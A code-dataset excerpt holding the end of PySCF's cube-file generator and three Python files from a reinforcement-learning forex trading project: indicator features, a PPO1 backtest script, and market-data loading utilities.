Number of grid point divisions in y direction.
nz : int
Number of grid point divisions in z direction.
resolution: float
Resolution of the mesh grid in the cube box. If resolution is
given in the input, the input nx/ny/nz have no effects. The value
of nx/ny/nz will be determined by the resolution and the cube box
size.
"""
from pyscf.pbc.gto import Cell
cc = Cube(mol, nx, ny, nz, resolution, margin)
GTOval = 'GTOval'
if isinstance(mol, Cell):
GTOval = 'PBC' + GTOval
# Compute density on the .cube grid
coords = cc.get_coords()
ngrids = cc.get_ngrids()
blksize = min(8000, ngrids)
orb_on_grid = numpy.empty(ngrids)
for ip0, ip1 in lib.prange(0, ngrids, blksize):
ao = mol.eval_gto(GTOval, coords[ip0:ip1])
orb_on_grid[ip0:ip1] = numpy.dot(ao, coeff)
orb_on_grid = orb_on_grid.reshape(cc.nx,cc.ny,cc.nz)
# Write out orbital to the .cube file
cc.write(orb_on_grid, outfile, comment='Orbital value in real space (1/Bohr^3)')
return orb_on_grid
def mep(mol, outfile, dm, nx=80, ny=80, nz=80, resolution=RESOLUTION,
margin=BOX_MARGIN):
"""Calculates the molecular electrostatic potential (MEP) and write out in
cube format.
Args:
mol : Mole
Molecule to calculate the electron density for.
outfile : str
Name of Cube file to be written.
dm : ndarray
Density matrix of molecule.
Kwargs:
nx : int
Number of grid point divisions in x direction.
Note this is function of the molecule's size; a larger molecule
will have a coarser representation than a smaller one for the
same value. Conflicts to keyword resolution.
ny : int
Number of grid point divisions in y direction.
nz : int
Number of grid point divisions in z direction.
resolution: float
Resolution of the mesh grid in the cube box. If resolution is
given in the input, the input nx/ny/nz have no effects. The value
of nx/ny/nz will be determined by the resolution and the cube box
size.
"""
cc = Cube(mol, nx, ny, nz, resolution, margin)
coords = cc.get_coords()
# Nuclear potential at given points
Vnuc = 0
for i in range(mol.natm):
r = mol.atom_coord(i)
Z = mol.atom_charge(i)
rp = r - coords
Vnuc += Z / numpy.einsum('xi,xi->x', rp, rp)**.5
# Potential of electron density
Vele = numpy.empty_like(Vnuc)
for p0, p1 in lib.prange(0, Vele.size, 600):
fakemol = gto.fakemol_for_charges(coords[p0:p1])
ints = df.incore.aux_e2(mol, fakemol)
Vele[p0:p1] = numpy.einsum('ijp,ij->p', ints, dm)
MEP = Vnuc - Vele # MEP at each point
MEP = MEP.reshape(cc.nx,cc.ny,cc.nz)
# Write the potential
cc.write(MEP, outfile, 'Molecular electrostatic potential in real space')
return MEP
class Cube(object):
''' Read-write of the Gaussian CUBE files
Attributes:
nx : int
Number of grid point divisions in x direction.
Note this is function of the molecule's size; a larger molecule
will have a coarser representation than a smaller one for the
same value. Conflicts to keyword resolution.
ny : int
Number of grid point divisions in y direction.
nz : int
Number of grid point divisions in z direction.
resolution: float
Resolution of the mesh grid in the cube box. If resolution is
given in the input, the input nx/ny/nz have no effects. The value
of nx/ny/nz will be determined by the resolution and the cube box
size. The unit is Bohr.
'''
def __init__(self, mol, nx=80, ny=80, nz=80, resolution=RESOLUTION,
margin=BOX_MARGIN, origin=ORIGIN, extent=EXTENT):
from pyscf.pbc.gto import Cell
self.mol = mol
coord = mol.atom_coords()
# If the molecule is periodic, use lattice vectors as the box
# and automatically determine margin, origin, and extent
if isinstance(mol, Cell):
self.box = mol.lattice_vectors()
atom_center = (numpy.max(coord, axis=0) + numpy.min(coord, axis=0))/2
box_center = (self.box[0] + self.box[1] + self.box[2])/2
self.boxorig = atom_center - box_center
else:
# Create a box based on its origin and extents/lengths (rectangular cuboid only)
# If extent is not supplied, use the coordinates plus a margin on both sides
if extent is None:
extent = numpy.max(coord, axis=0) - numpy.min(coord, axis=0) + 2*margin
self.box = numpy.diag(extent)
# if origin is not supplied, set it as the minimum coordinate minus a margin.
if origin is None:
origin = numpy.min(coord, axis=0) - margin
self.boxorig = numpy.asarray(origin)
if resolution is not None:
nx, ny, nz = numpy.ceil(numpy.diag(self.box) / resolution).astype(int)
self.nx = nx
self.ny = ny
self.nz = nz
if isinstance(mol, Cell):
# Use an asymmetric mesh for tiling unit cells
self.xs = numpy.linspace(0, 1, nx, endpoint=False)
self.ys = numpy.linspace(0, 1, ny, endpoint=False)
self.zs = numpy.linspace(0, 1, nz, endpoint=False)
else:
# Use endpoint=True to get a symmetric mesh
# see also the discussion https://github.com/sunqm/pyscf/issues/154
self.xs = numpy.linspace(0, 1, nx, endpoint=True)
self.ys = numpy.linspace(0, 1, ny, endpoint=True)
self.zs = numpy.linspace(0, 1, nz, endpoint=True)
def get_coords(self) :
""" Result: set of coordinates to compute a field which is to be stored
in the file.
"""
frac_coords = lib.cartesian_prod([self.xs, self.ys, self.zs])
return frac_coords @ self.box + self.boxorig # Convert fractional coordinates to real-space coordinates
def get_ngrids(self):
return self.nx * self.ny * self.nz
def get_volume_element(self):
return (self.xs[1]-self.xs[0])*(self.ys[1]-self.ys[0])*(self.zs[1]-self.zs[0])
def write(self, field, fname, comment=None):
""" Result: .cube file with the field in the file fname. """
assert(field.ndim == 3)
assert(field.shape == (self.nx, self.ny, self.nz))
if comment is None:
comment = 'Generic field? Supply the optional argument "comment" to define this line'
mol = self.mol
coord = mol.atom_coords()
with open(fname, 'w') as f:
f.write(comment+'\n')
f.write(f'PySCF Version: {pyscf.__version__} Date: {time.ctime()}\n')
f.write(f'{mol.natm:5d}')
f.write('%12.6f%12.6f%12.6f\n' % tuple(self.boxorig.tolist()))
delta = (self.box.T * [self.xs[1], self.ys[1], self.zs[1]]).T
f.write(f'{self.nx:5d}{delta[0,0]:12.6f}{delta[0,1]:12.6f}{delta[0,2]:12.6f}\n')
f.write(f'{self.ny:5d}{delta[1,0]:12.6f}{delta[1,1]:12.6f}{delta[1,2]:12.6f}\n')
f.write(f'{self.nz:5d}{delta[2,0]:12.6f}{delta[2,1]:12.6f}{delta[2,2]:12.6f}\n')
for ia in range(mol.natm):
atmsymb = mol.atom_symbol(ia)
f.write('%5d%12.6f'% (gto.charge(atmsymb), 0.))
f.write('%12.6f%12.6f%12.6f\n' % tuple(coord[ia]))
for ix in range(self.nx):
for iy in range(self.ny):
for iz0, iz1 in lib.prange(0, self.nz, 6):
fmt = '%13.5E' * (iz1-iz0) + '\n'
f.write(fmt % tuple(field[ix,iy,iz0:iz1].tolist()))
def read(self, cube_file):
with open(cube_file, 'r') as f:
f.readline()
f.readline()
data = f.readline().split()
natm = int(data[0])
self.boxorig = numpy.array([float(x) for x in data[1:]])
def parse_nx(data):
d = data.split()
return int(d[0]), numpy.array([float(x) for x in d[1:]])
self.nx, self.xs = parse_nx(f.readline())
self.ny, self.ys = parse_nx(f.readline())
self.nz, self.zs = parse_nx(f.readline())
atoms = []
for ia in range(natm):
d = f.readline().split()
atoms.append([int(d[0]), [float(x) for x in d[2:]]])
self.mol = gto.M(atom=atoms, unit='Bohr')
data = f.read()
cube_data = numpy.array([float(x) for x in data.split()])
return cube_data.reshape([self.nx, self.ny, self.nz])
if __name__ == '__main__':
from pyscf import scf
from pyscf.tools import cubegen
mol = gto.M(atom='''O 0.00000000, 0.000000, 0.000000
H 0.761561, 0.478993, 0.00000000
H -0.761561, 0.478993, 0.00000000''', basis='6-31g*')
mf = scf.RHF(mol).run()
cubegen.density(mol, 'h2o_den.cube', mf.make_rdm1()) #makes total density
cubegen.mep(mol, 'h2o_pot.cube', mf.make_rdm1())
cubegen.orbital(mol, 'h2o_mo1.cube', mf.mo_coeff[:,0])
```
|
{
"source": "jezuina/drl-trading",
"score": 2
}
|
#### File: drl-trading/features/ta.py
```python
import sys
sys.path.append("..")
import talib._ta_lib as talib
import numpy as np
from utils.math import my_log
def get_indicators_returns(security, open_name, high_name, low_name, close_name, volume_name):
# LOG_RR
# security['LOG_RR_0'] = my_log(security[close_name].shift(0).fillna(1) / security[open_name].shift(0).fillna(1))
security['LOG_RR_1'] = my_log(security[close_name].shift(1).fillna(1) / security[open_name].shift(1).fillna(1))
security['LOG_RR_2'] = my_log(security[close_name].shift(2).fillna(1) / security[open_name].shift(2).fillna(1))
security['LOG_RR_3'] = my_log(security[close_name].shift(3).fillna(1) / security[open_name].shift(3).fillna(1))
security['LOG_RR_4'] = my_log(security[close_name].shift(4).fillna(1) / security[open_name].shift(4).fillna(1))
security['LOG_RR_5'] = my_log(security[close_name].shift(5).fillna(1) / security[open_name].shift(5).fillna(1))
security['LOG_RR_6'] = my_log(security[close_name].shift(6).fillna(1) / security[open_name].shift(6).fillna(1))
security['LOG_RR_7'] = my_log(security[close_name].shift(7).fillna(1) / security[open_name].shift(7).fillna(1))
security['LOG_RR_8'] = my_log(security[close_name].shift(8).fillna(1) / security[open_name].shift(8).fillna(1))
security['LOG_RR_9'] = my_log(security[close_name].shift(9).fillna(1) / security[open_name].shift(9).fillna(1))
security['LOG_RR_10'] = my_log(security[close_name].shift(10).fillna(1) / security[open_name].shift(10).fillna(1))
security = security.dropna().astype(np.float32)
return security
```
#### File: jezuina/drl-trading/ppo1_fx_test.py
```python
import numpy as np
import matplotlib.pyplot as plt
import pyfolio as pf
from stable_baselines.common.vec_env import DummyVecEnv, VecNormalize
from stable_baselines import PPO1
from envs.pf_fx_env import PortfolioEnv
from utils.globals import EPS, MODELS_DIR
from utils.enums import compute_indicators, compute_reward, compute_position, lot_size
settings = {
# env
'data_file': 'fxcm_XXXUSD_H4_2015_2019_test_1983.h5',
# 'data_file': 'fxcm_EURUSD_H1_2019_2019_test_6232.h5',
'output_file': None,
'strategy_name': 'Strategy',
'total_steps': 1900,
'window_length': 1,
'capital_base': 1e4,
'lot_size': lot_size.Mini,
'leverage': 0.01,
'commission_percent': 0.0,
'commission_fixed': 0.0,
'max_slippage_percent': 0.1,
'start_idx': 1,
'compute_indicators': compute_indicators.returns, #
'compute_reward': compute_reward.profit, # profit sharpe sortino max_drawdown calmar omega downside risk
'compute_position': compute_position.long_and_short, # long_only short_only long_and_short add long/short bias for stocks
'add_noise': False,
'debug': False,
'model_name': 'fxcm_XXXUSD_H4_2015_2019_train_5990_ppo1_1000000_1_compute_indicators.returns_0.99_d955a70fac7449ec',
# 'model_name': 'fxcm_EURUSD_H1_2018_2019_train_10558_ppo1_1000000_1_compute_indicators.returns_0.99_b00a387ebda14a1a',
# agnet
'norm_obs': True,
'norm_reward': True,
'clip_obs': 10,
'clip_reward': 10
}
p_gamma = 0.9
def ppo1_test():
v_env = PortfolioEnv(settings['data_file'],settings['output_file'],settings['strategy_name'],settings['total_steps'],settings['window_length'],settings['capital_base'],settings['lot_size'],settings['leverage'],settings['commission_percent'],settings['commission_fixed'],settings['max_slippage_percent'],settings['start_idx'],settings['compute_indicators'],settings['compute_reward'],settings['compute_position'],settings['debug'])
# Create the vectorized environment
# v_env = DummyVecEnv([lambda: v_env])
# Normalize environment
# v_env = VecNormalize(v_env, norm_obs=settings['norm_obs'], norm_reward=settings['norm_reward'], clip_obs=settings['clip_obs'], clip_reward=settings['clip_reward'], gamma=p_gamma, epsilon=EPS)
model = PPO1.load(MODELS_DIR + settings['model_name'])
# Strategy
obs = v_env.reset()
dones = False
while not dones:
action, _states = model.predict(obs, deterministic=True)
obs, rewards, dones, info = v_env.step(action)
# v_env.render(mode='ansi')
v_env.strategy_name = 'fxcm_XXXUSD_H4 returns PPO1'
v_env.render(mode='human')
# pv,pp,pw=v_env.get_summary()
# pr=pv.sum(axis=1).pct_change().fillna(0)
pr = v_env.returns
# Random agent
obs = v_env.reset()
dones = False
while not dones:
# action, _states = model.predict(obs, deterministic=True)
action = v_env.action_sample
obs, rewards, dones, info = v_env.step(action)
# v_env.render(mode='ansi')
v_env.strategy_name = 'Random agent'
v_env.render(mode='human')
# Buy and hold
obs = v_env.reset()
dones = False
weights=np.concatenate((np.ones(len(v_env.instruments))/len(v_env.instruments),[0]))
# print(weights)
while not dones:
obs, rewards, dones, info = v_env.step(action=weights)
weights=v_env.current_weights
v_env.render(mode='ansi')
v_env.strategy_name = 'Buy and hold'
v_env.render(mode='human')
bpv,bpp,bpw=v_env.get_summary()
bpr=bpv.sum(axis=1).pct_change().fillna(0)
bpr = v_env.returns
'''
# Extended
pv,pp,pw=v_env.get_summary()
pv.sum(axis=1).plot()
plt.title('strategy')
plt.show()
bpv,bpp,bpw=v_env.get_summary()
bpv.sum(axis=1).plot()
plt.title('buy and hold')
plt.show()
pr=pv.sum(axis=1).pct_change().fillna(0)
bpr=bpv.sum(axis=1).pct_change().fillna(0)
'''
# pf.create_simple_tear_sheet(returns=pr,benchmark_rets=bpr)
pf.create_full_tear_sheet(returns=pr,benchmark_rets=bpr)
# Evaluate trading system defined in current file.
if __name__ == '__main__':
ppo1_test()
```
#### File: drl-trading/utils/data.py
```python
import h5py
import numpy as np
import pandas as pd
import fxcmpy
import datetime as dt
def pandas_fill(arr):
arr = arr.astype('float')
arr[arr == 0] = 'nan'
df = pd.DataFrame(arr)
print(df)
# fillna(method='ffill').fillna(method='bfill')
df.fillna(method='ffill', axis=0, inplace=True)
df.fillna(method='bfill', axis=0, inplace=True)
out = df.as_matrix()
return out
def read_h5_history(filepath, replace_zeros=True):
''' Read data from extracted h5
Args:
filepath: path of file
Returns:
history:
instruments:
'''
with h5py.File(filepath, 'r') as f:
history = f['history'][:]
if replace_zeros:
np.nan_to_num(history, 0)
mn = np.median(history[history > 0])
history[history==0] = mn
# instruments = ['rand']
instruments = f['instruments'][:].tolist()
instruments = [instrument.decode('utf-8') for instrument in instruments]
'''
try:
instruments = f['instruments'][:].tolist()
instruments = [instrument.decode('utf-8') for instrument in instruments]
except:
instruments = f['instruments']
'''
print('history has NaNs: {}, has infs: {}'.format(np.any(np.isnan(history)), np.any(np.isinf(history))))
return history, instruments
def read_h5_fx_history(filepath, replace_zeros=True):
''' Read data from extracted h5
Args:
filepath: path of file
Returns:
history:
instruments:
'''
with h5py.File(filepath, 'r') as f:
history = f['history'][:]
bid = f['history'][:]
ask = f['history'][:]
if replace_zeros:
np.nan_to_num(history, 0)
mn = np.median(history[history > 0])
history[history==0] = mn
np.nan_to_num(bid, 0)
mn = np.median(bid[bid > 0])
history[bid==0] = mn
np.nan_to_num(ask, 0)
mn = np.median(ask[ask > 0])
history[ask==0] = mn
instruments = f['instruments'][:].tolist()
instruments = [instrument.decode('utf-8') for instrument in instruments]
'''
try:
instruments = f['instruments'][:].tolist()
instruments = [instrument.decode('utf-8') for instrument in instruments]
except:
instruments = f['instruments']
'''
print('history has NaNs: {}, has infs: {}'.format(np.any(np.isnan(history)), np.any(np.isinf(history))))
print('bid has NaNs: {}, has infs: {}'.format(np.any(np.isnan(bid)), np.any(np.isinf(bid))))
print('ask has NaNs: {}, has infs: {}'.format(np.any(np.isnan(ask)), np.any(np.isinf(ask))))
return history, bid, ask, instruments
def write_to_h5py(history, instruments, filepath):
""" Write a numpy array history and a list of string to h5py
Args:
history: (N, timestamp, 5)
instruments: a list of stock instruments
Returns:
"""
with h5py.File(filepath, 'w') as f:
f.create_dataset('history', data=history)
instruments_array = np.array(instruments, dtype=object)
# string_dt = h5py.special_dtype(vlen=str)
string_dt = h5py.special_dtype(vlen=bytes)
f.create_dataset("instruments", data=instruments_array, dtype=string_dt)
def write_fx_to_h5py(history, bid, ask, instruments, filepath, fill_missing_values):
""" Write a numpy array history and a list of string to h5py
Args:
history: (N, timestamp, 5)
instruments: a list of stock instruments
Returns:
"""
if fill_missing_values:
history = pandas_fill(history)
with h5py.File(filepath, 'w') as f:
f.create_dataset('history', data=history)
f.create_dataset('bid', data=bid)
f.create_dataset('ask', data=ask)
instruments_array = np.array(instruments, dtype=object)
# string_dt = h5py.special_dtype(vlen=str)
string_dt = h5py.special_dtype(vlen=bytes)
f.create_dataset("instruments", data=instruments_array, dtype=string_dt)
def download_fxcm_data(data_file, instruments, period, start_date, end_date):
conn = fxcmpy.fxcmpy(config_file='./config/fxcm.cfg', server='demo')
history = np.empty(shape=(len(instruments), 0, 14), dtype=np.float)
m = 0
'''
npdata = data.to_numpy()
npdata = npdata [:,1:6]
print(npdata)
print(np.shape(npdata))
'''
for instrument in instruments:
data = conn.get_candles(instrument, period=period, start=start_date, stop=end_date)
df_data = pd.DataFrame(data)
Open = pd.DataFrame(data[['bidopen', 'askopen']].mean(axis=1), columns=['Open'])
High = pd.DataFrame(data[['bidhigh', 'askhigh']].mean(axis=1), columns=['High'])
Low = pd.DataFrame(data[['bidlow', 'asklow']].mean(axis=1), columns=['Low'])
Close = pd.DataFrame(data[['bidclose', 'askclose']].mean(axis=1), columns=['Close'])
Volume = pd.DataFrame(data[['tickqty']].mean(axis=1), columns=['Volume'])
df = pd.concat([Open, High, Low, Close, Volume, df_data], axis=1)
# export_csv = df.to_csv (r'C:\Users\hanna\Desktop\export_dataframe.csv', index = None, header=True)
npdata = df.to_numpy()
print(npdata)
history = np.resize(history, (history.shape[0], npdata.shape[0], history.shape[2]))
for d in range(npdata.shape[0]):
# print(np.shape(history))
history[m][d] = np.array([npdata[d,0], npdata[d,1], npdata[d,2], npdata[d,3], npdata[d,4],npdata[d,5], npdata[d,6], npdata[d,7], npdata[d,8], npdata[d,9], npdata[d,10], npdata[d,11], npdata[d,12], npdata[d,13]])
m += 1
write_to_h5py(history, instruments, data_file)
def read_csv_history(data_file, instruments, granularity, price, replace_zero=True):
''' Read data from extracted h5
Args:
filepath: path of file
Returns:
history:
instruments:
'''
history = np.empty(shape=(len(instruments), 0, 5), dtype=np.float)
m = 0
for instrument in instruments:
data_file.replace('instrument', instrument)
print("=========================")
print(data_file)
data_file.replace('granularity', granularity)
print("=========================")
print(data_file)
data_file.replace('price', price)
data = pd.read_csv(data_file)
npdata = data.to_numpy()
npdata = npdata [:,1:6]
print(np.shape(npdata))
history = np.resize(history, (history.shape[0], npdata.shape[0], history.shape[2]))
for d in range(npdata.shape[0]):
# print(np.shape(history))
history[m][d] = np.array([npdata[d,0], npdata[d,1], npdata[d,2], npdata[d,3], npdata[d,4]])
m += 1
return history
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.